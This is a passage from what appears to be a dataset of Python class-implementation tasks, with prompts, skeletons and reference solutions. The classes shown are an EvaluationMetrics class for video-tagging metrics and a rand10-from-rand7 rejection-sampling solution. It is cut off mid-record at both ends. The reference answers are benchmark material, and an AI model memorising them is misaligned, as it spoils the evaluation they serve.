num_positives)\nself.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\nself.num_examples += batch_size\nself.sum_hit_at_one += mean_hit_at_one * batch_size\nself.sum_perr += mean_perr * batch_size\nself.sum_loss += mean_loss * batch_size\nreturn {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}", "if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\navg_hit_at_one = self.sum_hit_at_one / self.num_examples\navg_perr = self.sum_perr / self.num_examples\navg_loss = self.sum_loss / self.num_examples\naps = self.map_calculator.peek_map_at_n()\ngap = self.global_ap_calculator.peek_ap_at_n()\ntag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\nprecision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\nrecall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\nprecision_at_5 = self.pr_calculator.get_precision_at_conf(0.5)\nrecall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\ntag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\ntag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\nepoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 'tag_precision': tag_precision, 'tag_recall': tag_recall}\nreturn epoch_info_dict", "self.sum_hit_at_one = 0.0\nself.sum_perr = 0.0\nself.sum_loss = 0.0\nself.map_calculator.clear()\nself.global_ap_calculator.clear()\nself.pr_calculator.clear()\nself.pr_calculator_per_tag.clear()\nself.num_examples = 0\nself.tag_correlation = 0.0\nself.nums_per_tag = 0.0\nself.tag_confidence = 0.0"], "bodies_text": "<|body_start_0|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\n self.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\n self.pr_calculator = PRCalculator()\n self.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\n self.accumulate_per_tag = accumulate_per_tag\n self.top_k = top_k\n self.num_examples = 0\n self.nums_per_tag = np.zeros(num_class)\n self.tag_corrlation = np.zeros((num_class, num_class))\n self.tag_confidence = np.zeros(num_class)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size = labels.shape[0]\n mean_hit_at_one = calculate_hit_at_one(predictions, labels)\n mean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\n mean_loss = loss\n self.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\n self.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, labels, self.top_k)\n self.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\n self.pr_calculator.accumulate(predictions, labels)\n if self.accumulate_per_tag:\n self.pr_calculator_per_tag.accumulate(predictions, labels)\n sparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\n self.map_calculator.accumulate(sparse_predictions, sparse_labels, num_positives)\n self.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\n self.num_examples += batch_size\n self.sum_hit_at_one += mean_hit_at_one * batch_size\n self.sum_perr += mean_perr * batch_size\n self.sum_loss += mean_loss * batch_size\n return {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}\n<|end_body_1|>\n\n<|body_start_2|>\n if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\n avg_hit_at_one = self.sum_hit_at_one / self.num_examples\n avg_perr = self.sum_perr / self.num_examples\n avg_loss = self.sum_loss / self.num_examples\n aps = self.map_calculator.peek_map_at_n()\n gap = self.global_ap_calculator.peek_ap_at_n()\n tag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\n precision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\n recall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\n precision_at_5 = self.pr_calculator.get_precision_at_conf(0.5)\n recall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\n tag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\n tag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\n epoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 'tag_precision': tag_precision, 'tag_recall': tag_recall}\n return epoch_info_dict\n<|end_body_2|>\n\n<|body_start_3|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.pr_calculator.clear()\n self.pr_calculator_per_tag.clear()\n self.num_examples = 0\n self.tag_correlation = 0.0\n self.nums_per_tag = 0.0\n self.tag_confidence = 0.0\n<|end_body_3|>\n", "class_docstring": "A class to store the evaluation metrics.", "class_name": "EvaluationMetrics", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass EvaluationMetrics:\n \"\"\"A class to store the evaluation metrics.\"\"\"\n\n def __init__(self, num_class, top_k, accumulate_per_tag=False):\n \"\"\"Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot not be constructed.\"\"\"\n <|body_0|>\n\n def accumulate(self, predictions, labels, loss):\n \"\"\"Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\"\"\"\n <|body_2|>\n\n def clear(self):\n \"\"\"Clear the evaluation metrics and reset the EvaluationMetrics object.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\n self.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\n self.pr_calculator = PRCalculator()\n self.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\n self.accumulate_per_tag = accumulate_per_tag\n self.top_k = top_k\n self.num_examples = 0\n self.nums_per_tag = np.zeros(num_class)\n self.tag_corrlation = np.zeros((num_class, num_class))\n self.tag_confidence = np.zeros(num_class)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size = labels.shape[0]\n mean_hit_at_one = calculate_hit_at_one(predictions, labels)\n mean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\n mean_loss = loss\n self.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\n self.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, labels, self.top_k)\n self.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\n self.pr_calculator.accumulate(predictions, labels)\n if self.accumulate_per_tag:\n self.pr_calculator_per_tag.accumulate(predictions, labels)\n sparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\n self.map_calculator.accumulate(sparse_predictions, sparse_labels, num_positives)\n self.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\n self.num_examples += batch_size\n self.sum_hit_at_one += mean_hit_at_one * batch_size\n self.sum_perr += mean_perr * batch_size\n self.sum_loss += mean_loss * batch_size\n return {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}\n<|end_body_1|>\n\n<|body_start_2|>\n if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\n avg_hit_at_one = self.sum_hit_at_one / self.num_examples\n avg_perr = self.sum_perr / self.num_examples\n avg_loss = self.sum_loss / self.num_examples\n aps = self.map_calculator.peek_map_at_n()\n gap = self.global_ap_calculator.peek_ap_at_n()\n tag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\n precision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\n recall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\n precision_at_5 = self.pr_calculator.get_precision_at_conf(0.5)\n recall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\n tag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\n tag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\n epoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 'tag_precision': tag_precision, 'tag_recall': tag_recall}\n return epoch_info_dict\n<|end_body_2|>\n\n<|body_start_3|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.pr_calculator.clear()\n self.pr_calculator_per_tag.clear()\n self.num_examples = 0\n self.tag_correlation = 0.0\n self.nums_per_tag = 0.0\n self.tag_confidence = 0.0\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000317", "length_bytes": 24184, "license_type": "no_license", "methods": [{"docstring": "Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot not be constructed.", "name": "__init__", "signature": "def __init__(self, num_class, top_k, accumulate_per_tag=False)"}, {"docstring": "Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.", "name": "accumulate", "signature": "def accumulate(self, predictions, labels, loss)"}, {"docstring": "Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).", "name": "get", "signature": "def get(self)"}, {"docstring": "Clear the evaluation metrics and reset the EvaluationMetrics object.", "name": "clear", "signature": "def clear(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006081", "prompt": "Implement the Python class `EvaluationMetrics` described below.\n\nClass description:\nA class to store the evaluation metrics.\n\nMethod signatures and docstrings:\n- def __init__(self, num_class, top_k, accumulate_per_tag=False): Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot not be constructed.\n- def accumulate(self, predictions, labels, loss): Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\n- def get(self): Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\n- def clear(self): Clear the evaluation metrics and reset the EvaluationMetrics object.", "prompted_full_text": "Implement the Python class `EvaluationMetrics` described below.\n\nClass description:\nA class to store the evaluation metrics.\n\nMethod signatures and docstrings:\n- def __init__(self, num_class, top_k, accumulate_per_tag=False): Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot not be constructed.\n- def accumulate(self, predictions, labels, loss): Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\n- def get(self): Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\n- def clear(self): Clear the evaluation metrics and reset the EvaluationMetrics object.\n\n<|skeleton|>\nclass EvaluationMetrics:\n \"\"\"A class to store the evaluation metrics.\"\"\"\n\n def __init__(self, num_class, top_k, accumulate_per_tag=False):\n \"\"\"Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot not be constructed.\"\"\"\n <|body_0|>\n\n def accumulate(self, predictions, labels, loss):\n \"\"\"Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\"\"\"\n <|body_2|>\n\n def clear(self):\n \"\"\"Clear the evaluation metrics and reset the EvaluationMetrics object.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\n self.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\n self.pr_calculator = PRCalculator()\n self.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\n self.accumulate_per_tag = accumulate_per_tag\n self.top_k = top_k\n self.num_examples = 0\n self.nums_per_tag = np.zeros(num_class)\n self.tag_corrlation = np.zeros((num_class, num_class))\n self.tag_confidence = np.zeros(num_class)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size = labels.shape[0]\n mean_hit_at_one = calculate_hit_at_one(predictions, labels)\n mean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\n mean_loss = loss\n self.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\n self.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, labels, self.top_k)\n self.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\n self.pr_calculator.accumulate(predictions, labels)\n if self.accumulate_per_tag:\n self.pr_calculator_per_tag.accumulate(predictions, labels)\n sparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\n self.map_calculator.accumulate(sparse_predictions, sparse_labels, num_positives)\n self.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\n self.num_examples += batch_size\n self.sum_hit_at_one += mean_hit_at_one * batch_size\n self.sum_perr += mean_perr * batch_size\n self.sum_loss += mean_loss * batch_size\n return {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}\n<|end_body_1|>\n\n<|body_start_2|>\n if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\n avg_hit_at_one = self.sum_hit_at_one / self.num_examples\n avg_perr = self.sum_perr / self.num_examples\n avg_loss = self.sum_loss / self.num_examples\n aps = self.map_calculator.peek_map_at_n()\n gap = self.global_ap_calculator.peek_ap_at_n()\n tag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\n precision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\n recall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\n precision_at_5 = self.pr_calculator.get_precision_at_conf(0.5)\n recall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\n tag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\n tag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\n epoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 'tag_precision': tag_precision, 'tag_recall': tag_recall}\n return epoch_info_dict\n<|end_body_2|>\n\n<|body_start_3|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.pr_calculator.clear()\n self.pr_calculator_per_tag.clear()\n self.num_examples = 0\n self.tag_correlation = 0.0\n self.nums_per_tag = 0.0\n self.tag_confidence = 0.0\n<|end_body_3|>\n", "revision_id": "aa5083f15e68b637403cd96bd43633b93dc59844", "skeleton": "<|skeleton|>\nclass EvaluationMetrics:\n \"\"\"A class to store the evaluation metrics.\"\"\"\n\n def __init__(self, num_class, top_k, accumulate_per_tag=False):\n \"\"\"Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot not be constructed.\"\"\"\n <|body_0|>\n\n def accumulate(self, predictions, labels, loss):\n \"\"\"Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\"\"\"\n <|body_2|>\n\n def clear(self):\n \"\"\"Clear the evaluation metrics and reset the EvaluationMetrics object.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class EvaluationMetrics:\n \"\"\"A class to store the evaluation metrics.\"\"\"\n\n def __init__(self, num_class, top_k, accumulate_per_tag=False):\n \"\"\"Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot not be constructed.\"\"\"\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\n self.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\n self.pr_calculator = PRCalculator()\n self.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\n self.accumulate_per_tag = accumulate_per_tag\n self.top_k = top_k\n self.num_examples = 0\n self.nums_per_tag = np.zeros(num_class)\n self.tag_corrlation = np.zeros((num_class, num_class))\n self.tag_confidence = np.zeros(num_class)\n\n def accumulate(self, predictions, labels, loss):\n \"\"\"Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\"\"\"\n batch_size = labels.shape[0]\n mean_hit_at_one = calculate_hit_at_one(predictions, labels)\n mean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\n mean_loss = loss\n self.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\n self.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, labels, self.top_k)\n self.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\n self.pr_calculator.accumulate(predictions, labels)\n if self.accumulate_per_tag:\n self.pr_calculator_per_tag.accumulate(predictions, labels)\n sparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\n self.map_calculator.accumulate(sparse_predictions, sparse_labels, num_positives)\n self.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\n self.num_examples += batch_size\n self.sum_hit_at_one += mean_hit_at_one * batch_size\n self.sum_perr += mean_perr * batch_size\n self.sum_loss += mean_loss * batch_size\n return {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}\n\n def get(self):\n \"\"\"Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\"\"\"\n if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\n avg_hit_at_one = self.sum_hit_at_one / self.num_examples\n avg_perr = self.sum_perr / self.num_examples\n avg_loss = self.sum_loss / self.num_examples\n aps = self.map_calculator.peek_map_at_n()\n gap = self.global_ap_calculator.peek_ap_at_n()\n tag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\n precision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\n recall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\n precision_at_5 = self.pr_calculator.get_precision_at_conf(0.5)\n recall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\n tag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\n tag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\n epoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 'tag_precision': tag_precision, 'tag_recall': tag_recall}\n return epoch_info_dict\n\n def clear(self):\n \"\"\"Clear the evaluation metrics and reset the EvaluationMetrics object.\"\"\"\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.pr_calculator.clear()\n self.pr_calculator_per_tag.clear()\n self.num_examples = 0\n self.tag_correlation = 0.0\n self.nums_per_tag = 0.0\n self.tag_confidence = 0.0\n", "source": "the_stack_v2_python_sparse", "source_path": "utils/train_util.py", "source_repo": "hezhiqian01/MultiModal-Tagging", "split": "test", "star_events_count": 4} {"blob_id": "ee6cf268644065e2e2e4a39c410bdb0ea77118c3", "bodies": ["while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1", "while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num = (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1"], "bodies_text": "<|body_start_0|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num = (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def rand10(self):\n \"\"\"拒绝采样\"\"\"\n <|body_0|>\n\n def rand10_new(self):\n \"\"\"拒绝采样-减少舍弃数字\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num = (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000318", "length_bytes": 1066, "license_type": "no_license", "methods": [{"docstring": "拒绝采样", "name": "rand10", "signature": "def rand10(self)"}, {"docstring": "拒绝采样-减少舍弃数字", "name": "rand10_new", "signature": "def rand10_new(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000089", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rand10(self): 拒绝采样\n- def rand10_new(self): 拒绝采样-减少舍弃数字", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rand10(self): 拒绝采样\n- def rand10_new(self): 拒绝采样-减少舍弃数字\n\n<|skeleton|>\nclass Solution:\n\n def rand10(self):\n \"\"\"拒绝采样\"\"\"\n <|body_0|>\n\n def rand10_new(self):\n \"\"\"拒绝采样-减少舍弃数字\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num = (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1\n<|end_body_1|>\n", "revision_id": "52756b30e9d51794591aca030bc918e707f473f1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def rand10(self):\n \"\"\"拒绝采样\"\"\"\n <|body_0|>\n\n def rand10_new(self):\n \"\"\"拒绝采样-减少舍弃数字\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def rand10(self):\n \"\"\"拒绝采样\"\"\"\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n\n def rand10_new(self):\n \"\"\"拒绝采样-减少舍弃数字\"\"\"\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num = (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1\n", "source": "the_stack_v2_python_sparse", "source_path": "470.用 Rand7() 实现 Rand10()/solution.py", "source_repo": "QtTao/daily_leetcode", "split": "test", "star_events_count": 0} {"blob_id": "2b5ff03bc155daaece7585ef8a03299574061b3a", "bodies": ["super().__init__(dev=dev, qubits=qubits, **kw)\nself.index_iteration = 1\nself.index_spectroscopy = 1\nself.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\nself.results = {}\nself.final_init(**kw)", "super().create_routine_template()\nfor i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)", "settings = {'QubitSpectroscopy1D': {'qubits': {}}}\nif self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in 